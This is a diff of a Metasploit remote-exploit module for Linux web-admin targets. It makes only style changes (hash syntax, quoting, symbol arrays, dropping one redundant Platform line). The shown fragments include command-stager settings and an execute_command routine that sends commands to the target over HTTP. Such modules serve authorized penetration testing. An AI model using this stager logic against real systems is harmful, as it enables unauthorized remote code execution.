@@ -58,7 +58,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['EDB', '37428']
         ],
         'Privileged' => false,
-        'Platform' => %w{linux},
         'Payload' => {
           'BadChars' => "\x00\x0a\x0d",
           'DisableNops' => true,
@@ -70,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => ARCH_X86,
-              'CmdStagerFlavor' => [ :echo, :printf ]
+              'CmdStagerFlavor' => %i[echo printf]
             }
           ],
           [
@@ -78,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => ARCH_X64,
-              'CmdStagerFlavor' => [ :echo, :printf ]
+              'CmdStagerFlavor' => %i[echo printf]
             }
           ]
         ],
@@ -124,10 +123,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    execute_cmdstager(:linemax => 200, :nodelete => true)
+    execute_cmdstager(linemax: 200, nodelete: true)
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, _opts)
     cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
 
     req(cmd)
@@ -167,13 +166,13 @@ class MetasploitModule < Msf::Exploit::Remote
       if res.code == 401
         fail_with(Failure::NoAccess,
                   "#{rhost}:#{rport} - Received a 401 HTTP response - " +
-                  "specify web admin credentials using the USERNAME " +
-                  "and PASSWORD advanced options to target this host.")
+                  'specify web admin credentials using the USERNAME ' +
+                  'and PASSWORD advanced options to target this host.')
       end
       if res.code == 404
         fail_with(Failure::Unreachable,
                   "#{rhost}:#{rport} - Received a 404 HTTP response - " +
-                  "your TARGETURI value is most likely not correct")
+                  'your TARGETURI value is most likely not correct')
       end
     end
   end
